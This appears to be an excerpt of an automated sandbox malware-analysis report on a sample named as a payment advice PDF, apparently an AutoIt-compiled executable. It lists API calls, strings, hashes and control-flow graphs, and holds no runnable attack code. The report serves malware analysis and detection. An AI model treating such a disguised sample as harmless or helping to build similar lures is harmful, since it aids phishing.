                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                              • String ID:
                                                              • API String ID: 1986165174-0
                                                              • Opcode ID: 1aa66f3c13beab755649fcb9a5669ebd1e1d755522e2abe90bd4978c3193962a
                                                              • Instruction ID: 079570504eba0165412be3bcd890b1262acb560046b2e9af74a96f90f042987e
                                                              • Opcode Fuzzy Hash: 1aa66f3c13beab755649fcb9a5669ebd1e1d755522e2abe90bd4978c3193962a
                                                              • Instruction Fuzzy Hash: 4A91B3319897C8DAC731CB6885506AABFF5FF2A304B485D6ED0CBD3A42D630E508C75A
                                                              Function 00844E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1063 844e89-844ea1 CreateStreamOnHGlobal 1064 844ec1-844ec6 1063->1064 1065 844ea3-844eba FindResourceExW 1063->1065 1066 87d933-87d942 LoadResource 1065->1066 1067 844ec0 1065->1067 1066->1067 1068 87d948-87d956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 87d95c-87d967 LockResource 1068->1069 1069->1067 1070 87d96d-87d975 1069->1070 1071 87d979-87d98b 1070->1071 1071->1067
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00844D8E,?,?,00000000,00000000), ref: 00844E99
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00844D8E,?,?,00000000,00000000), ref: 00844EB0
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00844D8E,?,?,00000000,00000000,?,?,?,?,?,?,00844E2F), ref: 0087D937
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00844D8E,?,?,00000000,00000000,?,?,?,?,?,?,00844E2F), ref: 0087D94C
                                                              • LockResource.KERNEL32(00844D8E,?,?,00844D8E,?,?,00000000,00000000,?,?,?,?,?,?,00844E2F,00000000), ref: 0087D95F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: 20ba5a4dc4234e3de0b16f8344aa7b1c914781268ed66e63061c23aef7787c68
                                                              • Instruction ID: 92645e991e5a77d44c4a949cfac1e8da08936dbfd71095c853cf5eedf32ec3d6
                                                              • Opcode Fuzzy Hash: 20ba5a4dc4234e3de0b16f8344aa7b1c914781268ed66e63061c23aef7787c68
                                                              • Instruction Fuzzy Hash: 18112A75240705BFE7218B65EC48F67BBBEFBC5B61F20826CF616D6250DB71E8008A60
                                                              Function 0084FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID:
                                                              • API String ID: 3964851224-0
                                                              • Opcode ID: b731b774c9be8b7874182cf4ea095de13f15f2f607b724c203aa469b4e3e1f3c
                                                              • Instruction ID: ccafb2bc71568f05e538a8de9a410765f5f5b5cee1c79b5e7f99ebce88e2f939
                                                              • Opcode Fuzzy Hash: b731b774c9be8b7874182cf4ea095de13f15f2f607b724c203aa469b4e3e1f3c
                                                              • Instruction Fuzzy Hash: E69236716087458FD720DF28C480B2ABBE1FB85314F14896DE89ADB262D775EC49CF92
                                                              Function 008A445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0087E398), ref: 008A446A
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 008A447B
                                                              • FindClose.KERNEL32(00000000), ref: 008A448B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 90739323e6049bfbaba3665d634bf982eb6bb628d341b7bc775574fc8e2850ae
                                                              • Instruction ID: cf4b48062bcb58f4743225d4e859390105db593f1de785e1b60968e42393bd67
                                                              • Opcode Fuzzy Hash: 90739323e6049bfbaba3665d634bf982eb6bb628d341b7bc775574fc8e2850ae
                                                              • Instruction Fuzzy Hash: 38E0D8324129046766106B38EC0D8E9776DFF4A335F100715F935D11D1E7F459009599
                                                              Function 0084E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Variable must be of type 'Object'., xrefs: 00883E62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Variable must be of type 'Object'.
                                                              • API String ID: 0-109567571
                                                              • Opcode ID: 087e881850cfccfbaad1e68d745e188b365ca6435faab8fb434e4d9daa8e5f9d
                                                              • Instruction ID: 71a42c3e90b94a67d6c9d4df8243061c543c258f23337f8499ed927255368789
                                                              • Opcode Fuzzy Hash: 087e881850cfccfbaad1e68d745e188b365ca6435faab8fb434e4d9daa8e5f9d
                                                              • Instruction Fuzzy Hash: 3CA28A75A0021DCFCB24CF58C480AAAB7B2FF58314F248469E955EB352D775ED82CB91
                                                              Function 008509D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00850A5B
                                                              • timeGetTime.WINMM ref: 00850D16
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00850E53
                                                              • Sleep.KERNEL32(0000000A), ref: 00850E61
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00850EFA
                                                              • DestroyWindow.USER32 ref: 00850F06
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00850F20
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00884E83
                                                              • TranslateMessage.USER32(?), ref: 00885C60
                                                              • DispatchMessageW.USER32(?), ref: 00885C6E
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00885C82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 4212290369-3242690629
                                                              • Opcode ID: 457579489c8cf3c67b26b601e68bf00edda05680538d8e03e72ba4ad61da9435
                                                              • Instruction ID: 92d67bb12ba26217952265de3c6ef7fa4ff1730f4067e9c19ccb227db0d0e21a
                                                              • Opcode Fuzzy Hash: 457579489c8cf3c67b26b601e68bf00edda05680538d8e03e72ba4ad61da9435
                                                              • Instruction Fuzzy Hash: C1B2BE70608745DFD724EF28C885BAABBE5FF84304F14491DE999D72A1DB71E848CB82
                                                              Function 008A9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 008A8F5F: __time64.LIBCMT ref: 008A8F69
                                                                • Part of subcall function 00844EE5: _fseek.LIBCMT ref: 00844EFD
                                                              • __wsplitpath.LIBCMT ref: 008A9234
                                                                • Part of subcall function 008640FB: __wsplitpath_helper.LIBCMT ref: 0086413B
                                                              • _wcscpy.LIBCMT ref: 008A9247
                                                              • _wcscat.LIBCMT ref: 008A925A
                                                              • __wsplitpath.LIBCMT ref: 008A927F
                                                              • _wcscat.LIBCMT ref: 008A9295
                                                              • _wcscat.LIBCMT ref: 008A92A8
                                                                • Part of subcall function 008A8FA5: _memmove.LIBCMT ref: 008A8FDE
                                                                • Part of subcall function 008A8FA5: _memmove.LIBCMT ref: 008A8FED
                                                              • _wcscmp.LIBCMT ref: 008A91EF
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9824
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9837
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008A9452
                                                              • _wcsncpy.LIBCMT ref: 008A94C5
                                                              • DeleteFileW.KERNEL32(?,?), ref: 008A94FB
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008A9511
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008A9522
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008A9534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                              • String ID:
                                                              • API String ID: 1500180987-0
                                                              • Opcode ID: 4f5d0bdc2dc58f8b46a012383bf04ade5e5790a7c1929260b3ef5f27aca5e0a1
                                                              • Instruction ID: e3fb1d46421ba3c0288d07cbfdcdebb684e2502fd2ff90052c231e47ecc8a064
                                                              • Opcode Fuzzy Hash: 4f5d0bdc2dc58f8b46a012383bf04ade5e5790a7c1929260b3ef5f27aca5e0a1
                                                              • Instruction Fuzzy Hash: AFC10BB1D0421DAADF21DF99CC85ADEB7BDFF45310F0040AAF609E6151EB309A458F66
                                                              Function 0084301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00843074
                                                              • RegisterClassExW.USER32(00000030), ref: 0084309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008430AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 008430CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008430DC
                                                              • LoadIconW.USER32(000000A9), ref: 008430F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00843101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 0c2cc4dcba8b7802780c4fc317e12ec23efa40f2dd26540272fbe507b8b8b666
                                                              • Instruction ID: 50acb39e7096fa68ca9c41e9848ddf6e73e85317ebee7bc727087b90de129cc6
                                                              • Opcode Fuzzy Hash: 0c2cc4dcba8b7802780c4fc317e12ec23efa40f2dd26540272fbe507b8b8b666
                                                              • Instruction Fuzzy Hash: F93129B1814358EFEB41CFA4E889ADABBF5FB09710F10812AFA50E62A1D7B54544CF90
                                                              Function 00843041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00843074
                                                              • RegisterClassExW.USER32(00000030), ref: 0084309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008430AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 008430CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008430DC
                                                              • LoadIconW.USER32(000000A9), ref: 008430F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00843101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 53354d438c057cc14af11b545c2d3dc9d18a230cc5658828d3afdb965bd97269
                                                              • Instruction ID: be11aa0b7ea8f13ae9594894204a22fbd3f8b16b24dabaea91839bbbf3f5b556
                                                              • Opcode Fuzzy Hash: 53354d438c057cc14af11b545c2d3dc9d18a230cc5658828d3afdb965bd97269
                                                              • Instruction Fuzzy Hash: 6E21C0B1915618AFEB00DFA4E889B9EBBF5FB08700F00812AFA11E62A1D7B14544DF95
                                                              Function 0084708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00844706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009052F8,?,008437AE,?), ref: 00844724
                                                                • Part of subcall function 0086050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00847165), ref: 0086052D
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008471A8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0087E8C8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0087E909
                                                              • RegCloseKey.ADVAPI32(?), ref: 0087E947
                                                              • _wcscat.LIBCMT ref: 0087E9A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 2673923337-2727554177
                                                              • Opcode ID: ab5bc05de4c726d45a5088a3e6f8d2e0749e04cddab19713246761ee7ce40c66
                                                              • Instruction ID: a0fd4384d1f671190a7fdddad466bb4a3ace13f074b52bff6cec54d9b7601629
                                                              • Opcode Fuzzy Hash: ab5bc05de4c726d45a5088a3e6f8d2e0749e04cddab19713246761ee7ce40c66
                                                              • Instruction Fuzzy Hash: 24719D715183059EC304EF2DE8819ABBBF8FF99310B40492EF555C72A1EB71D948DB52
                                                              Function 00843A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00843A50
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00843A5F
                                                              • LoadIconW.USER32(00000063), ref: 00843A76
                                                              • LoadIconW.USER32(000000A4), ref: 00843A88
                                                              • LoadIconW.USER32(000000A2), ref: 00843A9A
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00843AC0
                                                              • RegisterClassExW.USER32(?), ref: 00843B16
                                                                • Part of subcall function 00843041: GetSysColorBrush.USER32(0000000F), ref: 00843074
                                                                • Part of subcall function 00843041: RegisterClassExW.USER32(00000030), ref: 0084309E
                                                                • Part of subcall function 00843041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008430AF
                                                                • Part of subcall function 00843041: InitCommonControlsEx.COMCTL32(?), ref: 008430CC
                                                                • Part of subcall function 00843041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008430DC
                                                                • Part of subcall function 00843041: LoadIconW.USER32(000000A9), ref: 008430F2
                                                                • Part of subcall function 00843041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00843101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: c419c8fe293a0121d0631470bf57f474fce6b1ae879bf4c892448b5c4776a8ce
                                                              • Instruction ID: 6a429901c59cf35e209f14503a1e782b3416481d80298f3d3ed4c0e6260052a1
                                                              • Opcode Fuzzy Hash: c419c8fe293a0121d0631470bf57f474fce6b1ae879bf4c892448b5c4776a8ce
                                                              • Instruction Fuzzy Hash: F4214870D24708EFEB10DFA8EC09B9E7FB1FB08711F01412AE614A62B2D3B55654AF94
                                                              Function 00843633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 767 843633-843681 769 8436e1-8436e3 767->769 770 843683-843686 767->770 769->770 771 8436e5 769->771 772 8436e7 770->772 773 843688-84368f 770->773 774 8436ca-8436d2 DefWindowProcW 771->774 775 8436ed-8436f0 772->775 776 87d0cc-87d0fa call 851070 call 851093 772->776 777 843695-84369a 773->777 778 84374b-843753 PostQuitMessage 773->778 782 8436d8-8436de 774->782 783 843715-84373c SetTimer RegisterWindowMessageW 775->783 784 8436f2-8436f3 775->784 810 87d0ff-87d106 776->810 779 87d154-87d168 call 8a2527 777->779 780 8436a0-8436a2 777->780 781 843711-843713 778->781 779->781 804 87d16e 779->804 787 843755-84375f call 8444a0 780->787 788 8436a8-8436ad 780->788 781->782 783->781 789 84373e-843749 CreatePopupMenu 783->789 791 87d06f-87d072 784->791 792 8436f9-84370c KillTimer call 84443a call 843114 784->792 805 843764 787->805 794 8436b3-8436b8 788->794 795 87d139-87d140 788->795 789->781 798 87d074-87d076 791->798 799 87d0a8-87d0c7 MoveWindow 791->799 792->781 802 87d124-87d134 call 8a2d36 794->802 803 8436be-8436c4 794->803 795->774 809 87d146-87d14f call 897c36 795->809 806 87d097-87d0a3 SetFocus 798->806 807 87d078-87d07b 798->807 799->781 802->781 803->774 803->810 804->774 805->781 806->781 807->803 811 87d081-87d092 call 851070 807->811 809->774 810->774 816 87d10c-87d11f call 84443a call 84434a 810->816 811->781 816->774
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 008436D2
                                                              • KillTimer.USER32(?,00000001), ref: 008436FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0084371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084372A
                                                              • CreatePopupMenu.USER32 ref: 0084373E
                                                              • PostQuitMessage.USER32(00000000), ref: 0084374D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 108fb2e0a922fb8cea0d3460bfcca005d204028bf363dc9e2a856316dee978e4
                                                              • Instruction ID: ffd55db4c5c0e06c88a06269f5c42b194945758a7bfc6e039da404ce7331236c
                                                              • Opcode Fuzzy Hash: 108fb2e0a922fb8cea0d3460bfcca005d204028bf363dc9e2a856316dee978e4
                                                              • Instruction Fuzzy Hash: 4F4127B221460EBFDF245F68DC0DB7A36A5FF10300F154135FA12D62E6DB709E54AA62
                                                              Function 00843766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
